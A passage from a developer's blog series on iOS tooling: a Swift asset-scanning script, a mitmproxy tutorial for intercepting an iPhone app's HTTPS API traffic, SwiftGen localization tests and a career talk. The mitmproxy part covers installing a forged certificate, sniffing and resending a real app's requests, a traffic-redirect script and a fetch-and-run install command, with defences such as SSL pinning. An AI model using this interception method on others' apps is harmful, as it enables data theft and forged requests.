+ "UIImage\\(named:\\s*\"\(namePattern)\"\\)", // Default UIImage call (Swift)
+ "UIImage imageNamed:\\s*\\@\"\(namePattern)\"", // Default UIImage call
+ "\\<image name=\"\(namePattern)\".*", // Storyboard resources
+ "R.image.\(namePattern)\\(\\)" //R.swift support
+ ]
+ for p in patterns {
+ let regex = try? NSRegularExpression(pattern: p, options: [])
+ let range = NSRange(location:0, length:(inStringFile as NSString).length)
+ regex?.enumerateMatches(in: inStringFile,options: [], range: range) { result, _, _ in
+ if let r = result {
+ let value = (inStringFile as NSString).substring(with:r.range(at: 1))
+ localizedStrings.append(value)
+ }
+ }
+ }
+ return localizedStrings
+}
+
+func listUsedAssetLiterals() -> [String] {
+ let enumerator = FileManager.default.enumerator(atPath:sourcePath)
+ print(sourcePath)
+
+ #if swift(>=4.1)
+ return elementsInEnumerator(enumerator)
+ .filter { $0.hasSuffix(".m") || $0.hasSuffix(".swift") || $0.hasSuffix(".xib") || $0.hasSuffix(".storyboard") } // Only Swift and Obj-C files
+ .map { "\(sourcePath)/\($0)" } // Build file paths
+ .map { try? String(contentsOfFile: $0, encoding: .utf8)} // Get file contents
+ .compactMap{$0}
+ .compactMap{$0} // Remove nil entries
+ .map(localizedStrings) // Find localizedStrings occurrences
+ .flatMap{$0} // Flatten
+ #else
+ return elementsInEnumerator(enumerator)
+ .filter { $0.hasSuffix(".m") || $0.hasSuffix(".swift") || $0.hasSuffix(".xib") || $0.hasSuffix(".storyboard") } // Only Swift and Obj-C files
+ .map { "\(sourcePath)/\($0)" } // Build file paths
+ .map { try? String(contentsOfFile: $0, encoding: .utf8)} // Get file contents
+ .flatMap{$0}
+ .flatMap{$0} // Remove nil entries
+ .map(localizedStrings) // Find localizedStrings occurrences
+ .flatMap{$0} // Flatten
+ #endif
+}
+
^Traverse all project files and perform regex matching
1
+2
+3
+4
+
// To make an Error ❌ appear during build:
+print("ProjectFile.lproj" + "/file:line: " + "error: error message")
+// To make a Warning ⚠️ appear during build:
+print("ProjectFile.lproj" + "/file:line: " + "warning: warning message")
+
^print error or warning
You can refer to the above code methods to create your own desired tools.
After introducing these two checking tools, we can develop more confidently, efficiently, and reduce redundancy; also, this experience has been eye-opening, and in the future, if there are any new build run script requirements, we can directly use the most familiar language, Swift, to create them!
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Using mitmproxy on iOS+MacOS to perform a Man-in-the-middle attack to sniff API transmission data and how to prevent it?
Recently, we just held an internal CTF competition at the company. While brainstorming for topics, I recalled a project from my university days when I was working on backend (PHP) development. It was a point collection APP with a task list, and upon completing the trigger conditions, it would call an API to earn points. The boss thought that calling the API with HTTPS encrypted transmission was very secure — until I demonstrated a Man-in-the-middle attack, directly sniffing the transmission data and forging API calls to earn points…
In recent years, with the rise of big data, web crawlers are everywhere; the battle between crawlers and anti-crawlers is becoming increasingly intense, with various tricks being used. It’s a constant game of cat and mouse!
Another target for crawlers is the APP’s API. If there are no defenses, it’s almost like leaving the door wide open; it’s not only easy to operate but also clean in format, making it harder to identify and block. So if you’ve exhausted all efforts to block on the web end and data is still being crawled, you might want to check if the APP’s API has any vulnerabilities.
Since I didn’t know how to incorporate this topic into the CTF competition, I decided to write a separate article as a record. This article is just to give a basic concept — HTTPS can be decrypted through certificate replacement and how to enhance security to prevent it. The actual network theory is not my strong suit and has been forgotten, so if you already have a concept of this, you don’t need to spend time reading this article, or just scroll to the bottom to see how to protect your APP!
Environment: MacOS + iOS
Android users can directly download Packet Capture (free), iOS users can use Surge 4 (paid) to unlock the Man-in-the-middle attack feature, and MacOS users can also use another paid software, Charles.
This article mainly explains how to use the free mitmproxy on iOS. If you have the above environment, you don’t need to go through this trouble. Just open the APP on your phone, mount the VPN, and replace the certificate to perform a Man-in-the-middle attack! (Again, please scroll to the bottom to see how to protect your APP!)
[2021/02/25 Update]: Mac has a new free graphical interface program (Proxyman) that can be used, which can be paired with this article for reference in the first part.
Directly use brew to install:
1
+
brew install mitmproxy
+
Installation complete!
p.s. If you encounter brew: command not found, please first install the brew package management tool:
1
+
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
+
After installation, enter the following command in Terminal to activate:
1
+
mitmproxy
+
Startup Successful
Method (1) Mac connects to WiFi, and the phone uses the same WiFi Mac’s IP address = “System Preferences” -> “Network” -> “Wi-Fi” -> “IP Address”
Method (2) Mac uses a wired network, enables Internet Sharing; phone connects to the hotspot network:
System Preferences -> Sharing -> Select “Ethernet” -> Check “Wi-Fi” -> Enable “Internet Sharing”
Mac’s IP address = 192.168.2.1 (Note ⚠️ This is not the Ethernet IP, but the IP used by the Mac as a network sharing base station)
Settings -> WiFi -> HTTP Proxy -> Manual -> Enter Mac’s IP address in Server -> Enter 8080 in Port -> Save
At this point, it is normal for web pages not to open and for certificate errors to appear; let’s continue…
As mentioned above, the way a man-in-the-middle attack works is by using its own certificate to decrypt and encrypt data during communication; so we also need to install this custom certificate on the phone.
1. Open http://mitm.it on the phone’s Safari
Left side appears -> Proxy settings ✅ / Right side appears -> Proxy settings error 🚫
Apple -> Install Profile -> Install
⚠️ It’s not over yet, we need to enable the profile in the About section
General -> About -> Certificate Trust Settings -> Enable mitmproxy
Done! Now we can go back to the browser and browse web pages normally.
You can see the data transfer records from the phone on the mitmproxy Terminal
Find the record you want to sniff and view the Request (what parameters were sent) / Response (what content was returned)
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+
" ? " = View key operation documentation
+" k " / "⬆" = Up
+" j " / "⬇" = Down
+" h " / "⬅" = Left
+" l " / "➡️" = Right
+" space " = Next page
+" enter " = View details
+" q " = Go back to the previous page/exit
+" b " = Export response body to a specified path text file
+" f " = Filter records
+" z " = Clear all records
+" e " = Edit Request (cookie, headers, params...)
+" r " = Resend Request
+
Besides the mitmproxy activation method, we can change to:
1
+
mitmweb
+
to use the new Web GUI for operation and observation.
mitmweb
After setting up and familiarizing yourself with the above environment, you can proceed to our main event; sniffing the data transmission content of the APP API!
Here we use a certain real estate APP as an example, purely for academic exchange with no malicious intent!
We want to know how the API for the object list is requested and what content is returned!
First press “z” to clear all records (to avoid confusion)
Open the target APP
Open the target APP and try “pull to refresh” or trigger the “load next page” action.
🛑If your target APP cannot be opened or connected; sorry, it means the APP has protection measures and cannot be sniffed using this method. Please scroll down to the section on how to protect it🛑
mitmproxy records
Go back to mitmproxy to check the records, use your detective skills to guess which API request record is the one we want and enter to view the details!
Request
In the Request section, you can see what parameters were passed in the request.
With “e” to edit and “r” to resend, and observing the Response, you can guess the purpose of each parameter!
Response
The Response section also directly provides the original returned content.
🛑If the Response content is a bunch of codes; sorry, it means the APP might have its own encryption and decryption, making it impossible to sniff using this method. Please scroll down to the section on how to protect it🛑
Hard to read? Chinese garbled text? No problem, you can use “b” to export it as a text file to the desktop, then copy the content to Json Editor Online for parsing!
Or directly use mitmweb to browse and operate using the web GUI
mitmweb
After sniffing, observing, filtering, and testing, you can understand how the APP API works, and thus use it to scrape data.
After collecting the required information, remember to turn off mitmproxy and change the mobile network proxy server back to automatic to use the internet normally.
If after setting up mitmproxy, you find that the APP cannot be used or the returned content is encoded, it means the APP has protection.
Method (1):
Generally, it involves placing a copy of the certificate information in the APP. If the current HTTPS certificate does not match the information in the APP, access is denied. For details, you can see this or find related resources on SSL Pinning. The downside might be the need to pay attention to the certificate’s validity period!
https://medium.com/@dzungnguyen.hcm/ios-ssl-pinning-bffd2ee9efc
Method (2):
The APP encodes and encrypts the data before transmission. The API backend decrypts it to obtain the original request content. The API response is also encoded and encrypted before being sent back. The APP decrypts the received data to get the response content. This method is cumbersome and inefficient, but it is indeed a way to protect data. As far as I know, some digital banks use this method for protection!
Method 1 still has a way to be cracked: How to Bypass SSL Pinning on iOS 12
Method 2 can also be compromised through reverse engineering to obtain the encryption keys.
⚠️There is no 100% security⚠️
Or simply create a trap to collect evidence and solve it legally (?
“NEVER TRUST THE CLIENT”
1. Using mitmdump
Besides mitmproxy
and mitmweb
, mitmdump
can directly export all records to a text file:
1
+
mitmdump -w /log.txt
+
You can also use Method (2) with a Python script to set and filter traffic:
1
+
mitmdump -ns examples/filter.py -r /log.txt -w /result.txt
+
2. Use a Python script for request parameter settings, access control, and redirection:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+
from mitmproxy import http
+
+def request(flow: http.HTTPFlow) -> None:
+ # pretty_host takes the "Host" header of the request into account,
+ # which is useful in transparent mode where we usually only have the IP
+ # otherwise.
+
+ # Request parameter setting Example:
+ flow.request.headers['User-Agent'] = 'MitmProxy'
+
+ if flow.request.pretty_host == "123.com.tw":
+ flow.request.host = "456.com.tw"
+ # Redirect all access from 123.com.tw to 456.com.tw
+
Redirection example
When starting mitmproxy, add the parameter:
1
+2
+3
+4
+5
+
mitmproxy -s /redirect.py
+or
+mitmweb -s /redirect.py
+or
+mitmdump -s /redirect.py
+
When using mitmproxy to observe requests using HTTP 1.1 and Accept-Ranges: bytes, Content-Range for long connection segment continuous resource fetching, it will wait until the entire response is received before displaying, rather than showing segments and using persistent connections to continue downloading!
Since I don’t have domain permissions, I can’t obtain SSL certificate information, so I can’t implement it. The code doesn’t seem difficult, and although there’s no 100% secure method, adding an extra layer of protection can make it safer. Further attacks would require a lot of time to research, which should deter 90% of crawlers!
This article might be a bit low in value. I’ve neglected Medium for a while (playing with a DSLR). Mainly, this is to warm up for iPlayground 2019 this weekend (2019/09/21–2019/09/22). Looking forward to this year’s sessions 🤩, and hope to produce more quality articles after returning!
[Updated on 2019/02/22] What is the Experience of iPlayground 2019?
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Using SwifGen & UnitTest to ensure the safety of multilingual operations
Photo by Mick Haupt
iOS handles multilingual support through Localizable.strings plain text files, unlike Android which uses XML format for management. This means there is a risk of accidentally corrupting or missing language files during daily development. Additionally, multilingual errors are not detected at Build Time and are often only discovered after release when users from a specific region report issues, significantly reducing user confidence.
A previous painful experience involved forgetting to add ;
in Localizable.strings due to being too accustomed to Swift. This caused all subsequent strings in a particular language to break after release. An urgent hotfix was needed to resolve the issue.
As shown above, if the DESCRIPTION
Key is missing, the app will directly display DESCRIPTION
to the user.
;
, valid Key-Value pairs)The previous approach was to “ Use Swift to Write Shell Scripts Directly in Xcode! “ referencing the Localize 🏁 tool to develop a Command Line Tool in Swift for external multilingual file inspection. The script was then placed in Build Phases Run Script to perform checks at Build Time.
Advantages: The inspection program is injected externally, not dependent on the project. It can be executed without XCode or building the project, and can pinpoint the exact line in a file where the issue occurs. Additionally, it can perform formatting functions (sorting multilingual Keys A-Z).
Disadvantages: Increases Build Time (~+3 mins), process divergence, and scripts are difficult to maintain or adjust according to project structure. Since this part is not within the project, only the person who added this inspection knows the entire logic, making it hard for other collaborators to touch this part.
Interested readers can refer to the previous article. This article mainly introduces how to achieve all the inspection functions of Localizable.strings through XCode 13 + SwiftGen + UnitTest.
After upgrading to XCode 13, it comes with a built-in Build Time check for the Localizable.strings file format. The check is quite comprehensive, and besides missing ;
, it will also catch any extra meaningless strings.
SwiftGen helps us convert the original NSLocalizedString String access method to Object access, preventing typos and missing Key declarations.
SwiftGen is also a Command Line Tool; however, this tool is quite popular in the industry and has comprehensive documentation and community resources for maintenance. There is no need to worry about maintenance issues after introducing this tool.
You can choose the installation method according to your environment or CI/CD service settings. Here, we will use CocoaPods for a straightforward installation.
Please note that SwiftGen is not really a CocoaPod; it will not have any dependencies on the project’s code. Using CocoaPods to install SwiftGen is simply to download this Command Line Tool executable.
Add the swiftgen pod to the podfile
:
1
+
pod 'SwiftGen', '~> 6.0'
+
Init
After pod install
, open Terminal and cd
to the project directory
1
+
/L10NTests/Pods/SwiftGen/bin/swiftGen config init
+
Initialize the swiftgen.yml
configuration file and open it
1
+2
+3
+4
+5
+6
+7
+8
+
strings:
+ - inputs:
+ - "L10NTests/Supporting Files/zh-Hant.lproj/Localizable.strings"
+ outputs:
+ templateName: structured-swift5
+ output: "L10NTests/Supporting Files/SwiftGen-L10n.swift"
+ params:
+ enumName: "L10n"
+
Paste and modify it to fit your project’s format:
inputs: Project localization file location (it is recommended to specify the localization file of the DevelopmentLocalization language)
outputs: output: The location of the converted swift file params: enumName: Object name templateName: Conversion template
You can use swiftGen template list
to get the list of built-in templates
flat v.s. structured
The difference is that if the Key style is XXX.YYY.ZZZ
, the flat template will convert it to camelCase; the structured template will convert it to XXX.YYY.ZZZ
object according to the original style.
Pure Swift projects can directly use the built-in templates, but if it is a Swift mixed with OC project, you need to customize the template:
flat-swift5-objc.stencil
:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+
// swiftlint:disable all
+// Generated using SwiftGen — https://github.com/SwiftGen/SwiftGen
+
+{% if tables.count > 0 %}
+{% set accessModifier %}{% if param.publicAccess %}public{% else %}internal{% endif %}{% endset %}
+import Foundation
+
+// swiftlint:disable superfluous_disable_command file_length implicit_return
+
+// MARK: - Strings
+
+{% macro parametersBlock types %}{% filter removeNewlines:"leading" %}
+ {% for type in types %}
+ {% if type == "String" %}
+ _ p{{forloop.counter}}: Any
+ {% else %}
+ _ p{{forloop.counter}}: {{type}}
+ {% endif %}
+ {{ ", " if not forloop.last }}
+ {% endfor %}
+{% endfilter %}{% endmacro %}
+{% macro argumentsBlock types %}{% filter removeNewlines:"leading" %}
+ {% for type in types %}
+ {% if type == "String" %}
+ String(describing: p{{forloop.counter}})
+ {% elif type == "UnsafeRawPointer" %}
+ Int(bitPattern: p{{forloop.counter}})
+ {% else %}
+ p{{forloop.counter}}
+ {% endif %}
+ {{ ", " if not forloop.last }}
+ {% endfor %}
+{% endfilter %}{% endmacro %}
+{% macro recursiveBlock table item %}
+ {% for string in item.strings %}
+ {% if not param.noComments %}
+ {% for line in string.translation|split:"\n" %}
+ /// {{line}}
+ {% endfor %}
+ {% endif %}
+ {% if string.types %}
+ {{accessModifier}} static func {{string.key|swiftIdentifier:"pretty"|lowerFirstWord|escapeReservedKeywords}}({% call parametersBlock string.types %}) -> String {
+ return {{enumName}}.tr("{{table}}", "{{string.key}}", {% call argumentsBlock string.types %})
+ }
+ {% elif param.lookupFunction %}
+ {# custom localization function is mostly used for in-app lang selection, so we want the loc to be recomputed at each call for those (hence the computed var) #}
+ {{accessModifier}} static var {{string.key|swiftIdentifier:"pretty"|lowerFirstWord|escapeReservedKeywords}}: String { return {{enumName}}.tr("{{table}}", "{{string.key}}") }
+ {% else %}
+ {{accessModifier}} static let {{string.key|swiftIdentifier:"pretty"|lowerFirstWord|escapeReservedKeywords}} = {{enumName}}.tr("{{table}}", "{{string.key}}")
+ {% endif %}
+ {% endfor %}
+ {% for child in item.children %}
+ {% call recursiveBlock table child %}
+ {% endfor %}
+{% endmacro %}
+// swiftlint:disable function_parameter_count identifier_name line_length type_body_length
+{% set enumName %}{{param.enumName|default:"L10n"}}{% endset %}
+@objcMembers {{accessModifier}} class {{enumName}}: NSObject {
+ {% if tables.count > 1 or param.forceFileNameEnum %}
+ {% for table in tables %}
+ {{accessModifier}} enum {{table.name|swiftIdentifier:"pretty"|escapeReservedKeywords}} {
+ {% filter indent:2 %}{% call recursiveBlock table.name table.levels %}{% endfilter %}
+ }
+ {% endfor %}
+ {% else %}
+ {% call recursiveBlock tables.first.name tables.first.levels %}
+ {% endif %}
+}
+// swiftlint:enable function_parameter_count identifier_name line_length type_body_length
+
+// MARK: - Implementation Details
+
+extension {{enumName}} {
+ private static func tr(_ table: String, _ key: String, _ args: CVarArg...) -> String {
+ {% if param.lookupFunction %}
+ let format = {{ param.lookupFunction }}(key, table)
+ {% else %}
+ let format = {{param.bundle|default:"BundleToken.bundle"}}.localizedString(forKey: key, value: nil, table: table)
+ {% endif %}
+ return String(format: format, locale: Locale.current, arguments: args)
+ }
+}
+{% if not param.bundle and not param.lookupFunction %}
+
+// swiftlint:disable convenience_type
+private final class BundleToken {
+ static let bundle: Bundle = {
+ #if SWIFT_PACKAGE
+ return Bundle.module
+ #else
+ return Bundle(for: BundleToken.self)
+ #endif
+ }()
+}
+// swiftlint:enable convenience_type
+{% endif %}
+{% else %}
+// No string found
+{% endif %}
+
The above provides a template collected from the internet and customized to be compatible with Swift and Objective-C. You can create a flat-swift5-objc.stencil
file and paste the content or click here to download the .zip.
If you use a custom template, you won’t use templateName
, but instead declare templatePath
:
swiftgen.yml
:
1
+2
+3
+4
+5
+6
+7
+8
+
strings:
+ - inputs:
+ - "L10NTests/Supporting Files/zh-Hant.lproj/Localizable.strings"
+ outputs:
+ templatePath: "path/to/flat-swift5-objc.stencil"
+ output: "L10NTests/Supporting Files/SwiftGen-L10n.swift"
+ params:
+ enumName: "L10n"
+
Specify the templatePath
to the location of the .stencil
template in the project.
Generator
After setting it up, you can manually run in Terminal:
1
+
/L10NTests/Pods/SwiftGen/bin/swiftGen
+
Execute the conversion. After the first conversion, manually drag the converted result file (SwiftGen-L10n.swift) from Finder into the project so the program can use it.
Run Script
In the project settings -> Build Phases -> + -> New Run Script Phases -> paste:
1
+2
+3
+4
+5
+6
+
if [[ -f "${PODS_ROOT}/SwiftGen/bin/swiftgen" ]]; then
+ echo "${PODS_ROOT}/SwiftGen/bin/swiftgen"
+ "${PODS_ROOT}/SwiftGen/bin/swiftgen"
+else
+ echo "warning: SwiftGen is not installed. Run 'pod install --repo-update' to install it."
+fi
+
This way, the generator will run and produce the latest conversion results every time the project is built.
How to use in CodeBase?
1
+2
+
L10n.homeTitle
+L10n.homeDescription("ZhgChgLi") // with arg
+
With Object Access, there will be no typos, and keys used in the code but not declared in the Localizable.strings file will not occur.
However, SwiftGen can only generate from a specific language, so it cannot prevent the situation where a key exists in the generated language but is forgotten in other languages. This situation can only be protected by the following UnitTest.
Conversion
Conversion is the most challenging part of this issue because a project that has already been developed extensively uses NSLocalizedString
. Converting it to the new L10n.XXX
format is complex, especially for sentences with parameters String(format: NSLocalizedString
. Additionally, if Objective-C is mixed in, you must consider the different syntax between Objective-C and Swift.
There is no special solution; you can only write a Command Line Tool yourself. Refer to the previous article on using Swift to scan the project directory and parse NSLocalizedString
with Regex to write a small tool for conversion.
It is recommended to convert one scenario at a time, ensuring it can build before converting the next one.
We can write UniTest to read the contents of the .strings
file from the Bundle and test it.
Read .strings
from Bundle and convert to object:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+
class L10NTestsTests: XCTestCase {
+
+ private var localizations: [Bundle: [Localization]] = [:]
+
+ override func setUp() {
+ super.setUp()
+
+ let bundles = [Bundle(for: type(of: self))]
+
+ //
+ bundles.forEach { bundle in
+ var localizations: [Localization] = []
+
+ bundle.localizations.forEach { lang in
+ var localization = Localization(lang: lang)
+
+ if let lprojPath = bundle.path(forResource: lang, ofType: "lproj"),
+ let lprojBundle = Bundle(path: lprojPath) {
+
+ let filesInLPROJ = (try? FileManager.default.contentsOfDirectory(atPath: lprojBundle.bundlePath)) ?? []
+ localization.localizableStringFiles = filesInLPROJ.compactMap { fileFullName -> L10NTestsTests.Localization.LocalizableStringFile? in
+ let fileName = URL(fileURLWithPath: fileFullName).deletingPathExtension().lastPathComponent
+ let fileExtension = URL(fileURLWithPath: fileFullName).pathExtension
+ guard fileExtension == "strings" else { return nil }
+ guard let path = lprojBundle.path(forResource: fileName, ofType: fileExtension) else { return nil }
+
+ return L10NTestsTests.Localization.LocalizableStringFile(name: fileFullName, path: path)
+ }
+
+ localization.localizableStringFiles.enumerated().forEach { (index, localizableStringFile) in
+ if let fileContent = try? String(contentsOfFile: localizableStringFile.path, encoding: .utf8) {
+ let lines = fileContent.components(separatedBy: .newlines)
+ let pattern = "\"(.*)\"(\\s*)(=){1}(\\s*)\"(.+)\";"
+ let regex = try? NSRegularExpression(pattern: pattern, options: [])
+ let values = lines.compactMap { line -> Localization.LocalizableStringFile.Value? in
+ let range = NSRange(location: 0, length: (line as NSString).length)
+ guard let matches = regex?.firstMatch(in: line, options: [], range: range) else { return nil }
+ let key = (line as NSString).substring(with: matches.range(at: 1))
+ let value = (line as NSString).substring(with: matches.range(at: 5))
+ return Localization.LocalizableStringFile.Value(key: key, value: value)
+ }
+ localization.localizableStringFiles[index].values = values
+ }
+ }
+
+ localizations.append(localization)
+ }
+ }
+
+ self.localizations[bundle] = localizations
+ }
+ }
+}
+
+private extension L10NTestsTests {
+ struct Localization: Equatable {
+ struct LocalizableStringFile {
+ struct Value {
+ let key: String
+ let value: String
+ }
+
+ let name: String
+ let path: String
+ var values: [Value] = []
+ }
+
+ let lang: String
+ var localizableStringFiles: [LocalizableStringFile] = []
+
+ static func == (lhs: Self, rhs: Self) -> Bool {
+ return lhs.lang == rhs.lang
+ }
+ }
+}
+
We defined a Localization
to store the parsed data, find lproj
from the Bundle
, then find .strings
from it, and then use regular expressions to convert multilingual sentences into objects and put them back into Localization
for subsequent testing.
Here are a few things to note:
Bundle(for: type(of: self))
to get resources from the Test TargetUTF-8
, otherwise, reading the file content using String will fail (the default is Binary).strings
File to the Test TargetTestCase 1. Test for duplicate Keys in the same .strings file:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+
func testNoDuplicateKeysInSameFile() throws {
+ localizations.forEach { (_, localizations) in
+ localizations.forEach { localization in
+ localization.localizableStringFiles.forEach { localizableStringFile in
+ let keys = localizableStringFile.values.map { $0.key }
+ let uniqueKeys = Set(keys)
+ XCTAssertTrue(keys.count == uniqueKeys.count, "Localized Strings File: \(localizableStringFile.path) has duplicated keys.")
+ }
+ }
+ }
+}
+
Input:
Result:
TestCase 2. Compare with DevelopmentLocalization language to check for missing/redundant Keys:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+
func testCompareWithDevLangHasMissingKey() throws {
+ localizations.forEach { (bundle, localizations) in
+ let developmentLang = bundle.developmentLocalization ?? "en"
+ if let developmentLocalization = localizations.first(where: { $0.lang == developmentLang }) {
+ let othersLocalization = localizations.filter { $0.lang != developmentLang }
+
+ developmentLocalization.localizableStringFiles.forEach { developmentLocalizableStringFile in
+ let developmentLocalizableKeys = Set(developmentLocalizableStringFile.values.map { $0.key })
+ othersLocalization.forEach { otherLocalization in
+ if let otherLocalizableStringFile = otherLocalization.localizableStringFiles.first(where: { $0.name == developmentLocalizableStringFile.name }) {
+ let otherLocalizableKeys = Set(otherLocalizableStringFile.values.map { $0.key })
+ if developmentLocalizableKeys.count < otherLocalizableKeys.count {
+ XCTFail("Localized Strings File: \(otherLocalizableStringFile.path) has redundant keys.")
+ } else if developmentLocalizableKeys.count > otherLocalizableKeys.count {
+ XCTFail("Localized Strings File: \(otherLocalizableStringFile.path) has missing keys.")
+ }
+ } else {
+ XCTFail("Localized Strings File not found in Lang: \(otherLocalization.lang)")
+ }
+ }
+ }
+ } else {
+ XCTFail("developmentLocalization not found in Bundle: \(bundle)")
+ }
+ }
+}
+
Input: (Compared to DevelopmentLocalization, other languages lack the declaration Key)
Output:
Input: (DevelopmentLocalization does not have this Key, but it appears in other languages)
Output:
Combining the above methods, we use:
This solution cannot be achieved, and the original Command Line Tool written in Swift is still needed. However, the Format part can be done in git pre-commit; if there is no diff adjustment, it will not be done to avoid running once every build:
1
+2
+3
+4
+5
+6
+7
+8
+
#!/bin/sh
+
+diffStaged=${1:-\-\-staged} # use $1 if exist, default --staged.
+
+git diff --diff-filter=d --name-only $diffStaged | grep -e 'Localizable.*\.\(strings\|stringsdict\)$' | \
+ while read line; do
+ // do format for ${line}
+done
+
The same principle can be applied to .stringdict
swiftgen does not need to be placed in the build phase, as it runs every build, and the code appears only after the build is complete. It can be changed to generate the command only when there are adjustments.
The UnitTest program can be optimized to output clearly which Key is Missing/Redundant/Duplicate.
As mentioned in the previous talk “ 2021 Pinkoi Tech Career Talk — High-Efficiency Engineering Team Unveiled “, in large teams, multilingual work can be separated through third-party services, reducing the dependency on multilingual work.
Engineers only need to define the Key, and multilingual content will be automatically imported from the platform during the CI/CD stage, reducing the manual maintenance phase and making it less prone to errors.
Wei Cao , iOS Developer @ Pinkoi
For any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Pinkoi Developers’ Night 2022 Year-End Exchange Meeting — 15 Minutes Career Sharing Talk
Event Link: Linkedin
Main Audience: Students from various universities and colleges majoring in information-related fields
Location and Time: 2022/12/01 7:00 PM — 9:00 PM
Sharing Duration: 15 mins
Currently serving as Pinkoi Platform (App) Engineer Lead and iOS Engineer, previously worked at StreetVoice, Addcn Technology (listed company 5287), Startup; self-taught web programming since vocational high school, won the National Skills Competition web design category championship and was a reserve national representative, graduated from the Department of Information Management at National Taiwan University of Science and Technology, transitioned to iOS App development in 2017.
Passionate about exploration and technical exchange, also writes about daily life or unboxing experiences, welcome to follow my Medium Blog.
Pinkoi products support desktop, mobile, iOS, Android platforms, and six languages: Traditional Chinese, Hong Kong Traditional, Simplified Chinese, Japanese, Thai, and English.
Behind the scenes, there are 8+ squad teams responsible for different aspects of work, such as: Buyer Squad for the buyer side, Seller Squad for the seller side, Platform Squad for the underlying platform, AI Squad for algorithms, etc., working together to build Pinkoi products.
Note: This image does not represent a comprehensive or up-to-date Tech Stack
To do a good job, one must first sharpen one’s tools. The above image lists the Tech Stack and tools/services used by the Pinkoi development team; it also lists cross-team collaboration tools such as Slack, Asana, Figma, etc.
As the team size grows, there will be more times when communication or repetitive work is needed. At this time, by introducing tool services, we can effectively untangle the connections between people and increase team work efficiency.
At Pinkoi, although engineers are assigned to various Squad Teams, they still work together with one heart, Win as a team, we are still the same family.
Teammates with the same functions (e.g. iOS/Android/BE/FE/Data…) not only hold regular technical exchange sharing sessions, but also conduct Code Reviews and System Design discussions in daily development; discussing together, growing together!
The “Guai Guai” tattoo sticker in the middle of the picture is a blessing ceremony for the launch of the team’s “Gift List” feature and the “2022 Pinkoi Design Fest” event, ensuring the service is safe and stable.
In addition to completing tasks, Engineers have many ways to help advance business goals:
First, aside from the Engineer role, starting from oneself; we can propose our own life usage experiences and various creative ideas during the project planning period. For example, observing friends’ usage habits or new trendy cool things (e.g. iOS 16 Dynamic Island), brainstorming together might turn an ordinary feature into a new highlight!
Then back to engineering itself, the first is of course the essential development ability. Good development ability can maintain scalability and stability, reduce technical debt, and lower future maintenance costs, indirectly increasing business value. Similarly, the correct technical choices can maximize value with limited development resources; all these require a lot of hard skills and experience accumulation.
In addition, leveraging communication and coordination skills can make cross-engineering discussions more efficient, and leveraging collaboration skills can reduce rework; all can greatly increase team output and further advance business goals.
In summary, engineers definitely do not only create value by writing code.
At Pinkoi, Squad Team Sync-ups or project discussion meetings involve not only engineers but also designers, PMs, and analysts, participating in project discussions together; everyone can propose their own ideas, sparking different inspirations.
From personal experience, startup culture (also in Pinkoi) has five characteristics:
These characteristics are relatively rare in traditional large companies. Traditional companies are mostly more closed and rigid, with little room for suggestions, limited things to see and do, and more resistant to new changes and attempts; it is relatively difficult for energetic newcomers to perform.
Engineer at 28 vs. Engineer at 46 (Elon Musk was also an engineer); although it’s a meme, it means that what kind of engineer you want to become is up to you.
Besides having lean development skills, I believe the mindset is even more important. Life is a journey with many stages and roles to fulfill. The first is to constantly step out of your comfort zone and be prepared to face higher challenges. For example, I initially started as a backend engineer, then transitioned to iOS development, and now I’m starting to take on management roles.
The second is the exploration of direction. Do not limit yourself; everyone has infinite possibilities. You can continuously adjust to find the direction that suits you and shine in your area of expertise. We have teammates who switched to engineering later in their careers or transitioned from designers to PMs. Additionally, think about what role you want to play at 30 or 40 years old, such as continuing to delve into technology to become an architect/Tech Lead or taking on management roles.
Also, lifelong learning is essential. Knowledge is endless, especially in the information industry, which is ever-changing. Without seeking innovation and change, it’s easy to be eliminated by the industry.
Lastly, maintaining a balance between work and life is also crucial. Work Hard, Play Hard not only improves work efficiency but also allows you to draw inspiration from life experiences. As mentioned earlier, a small idea might change the world and create higher commercial value!
I advise newcomers to choose carefully for their first few jobs. The sunk cost is very low when you first enter society. Prioritize finding a job where you can learn something. Try to join companies that develop their own products (e.g., Pinkoi /Line/StreetVoice…) and avoid changing jobs too frequently (stay for at least a year). This will be very beneficial for your future career.
Life is long, and I hope everyone finds their own path. Thank you.
Join Pinkoi now »> https://www.pinkoi.com/about/careers
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Study on improving page loading speed by preloading and caching resources in iOS WKWebView.
Photo by Antoine Gravier
